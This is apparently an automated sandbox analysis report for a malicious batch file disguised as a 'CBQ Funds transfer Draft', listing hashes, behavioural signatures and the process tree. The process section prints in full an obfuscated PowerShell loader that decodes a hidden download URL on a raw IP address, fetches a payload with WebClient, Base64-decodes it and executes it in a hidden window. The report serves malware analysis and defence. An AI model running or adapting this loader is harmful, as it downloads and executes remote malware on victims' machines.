Analysis
max time kernel: 147s
max time network: 143s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 10/06/2024, 16:13
Static task: static1
Behavioral task: behavioral1
  Sample: CBQ Funds transfer DraftUdkikspostens44.bat
  Resource: win10v2004-20240508-en
Behavioral task: behavioral2
  Sample: CBQ Funds transfer DraftUdkikspostens44.bat
  Resource: win11-20240419-en
General
Target: CBQ Funds transfer DraftUdkikspostens44.bat
Size: 6KB
MD5: 84cb66117acd5104ada1321c3b472f94
SHA1: ee6ca999a1798296139fc0eddca01b10d955e00d
SHA256: 7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
SHA512: 483f0f275710dfceef0af0da3ddf3b72a52a80ab788d31fca647e3a28d585f1feedffad182baa9b1ba70e32b8e671c6823b74352db950ad27fd3f3d71ced349e
SSDEEP: 192:Fk33ynxcIG+cPPX99/PdQ9LXJICyD+QRK:FkSmtnN5FQpJJ
Malware Config
Signatures
Blocklisted process makes network request (6 IoCs)
  flow  pid   Process
  1     2556  powershell.exe
  2     2556  powershell.exe
  7     2556  powershell.exe
  9     2556  powershell.exe
  10    2556  powershell.exe
  11    2556  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2556  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2556  powershell.exe
  2556  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2556  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  description                       pid   Process         procid_target
  PID 4732 wrote to memory of 2556  4732  cmd.exe         78
  PID 4732 wrote to memory of 2556  4732  cmd.exe         78
  PID 2556 wrote to memory of 1744  2556  powershell.exe  80
  PID 2556 wrote to memory of 1744  2556  powershell.exe  80
Processes
1. C:\Windows\system32\cmd.exe
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
   - Suspicious use of WriteProcessMemory
   PID: 4732
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. 
';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne 
'.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. 
RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"2⤵
   - Blocklisted process makes network request
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   PID: 2556
3. C:\Windows\system32\cmd.exe
   "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
   PID: 1744
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82